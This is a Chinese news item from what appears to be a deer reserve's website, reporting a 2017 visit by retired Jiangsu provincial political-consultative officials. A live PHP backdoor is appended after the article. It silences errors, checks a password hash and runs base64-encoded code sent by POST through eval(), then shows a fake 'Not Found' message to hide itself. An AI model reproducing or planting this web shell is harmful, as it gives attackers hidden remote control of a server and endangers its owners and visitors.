最新要闻

首页 > 最新要闻 >

    省政协老同志来麋鹿保护区考察

    2017年11月7日,江苏省政协老同志一行20余人来麋鹿保护区考察。

     

    省政协老同志一行先在中华麋鹿园景区游客中心展厅观看了纪录片《归来的麋鹿》。随后乘坐电瓶游览车进入麋鹿半散养区,与麋鹿们近距离接触。省政协的老同志中不乏摄影爱好者,他们纷纷拿起手中的相机拍下广场上的和平鸽与夕阳余晖下的麋鹿们,麋鹿、夕阳、薄雾融为一体,朦胧而又宁静。

    省政协老同志们此行非常愉快,他们都夸赞景区内景色宜人、麋鹿群非常壮观,希望保护区能够继续为麋鹿保护事业作努力,他们也会持续关注麋鹿保护事业,并作出贡献。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>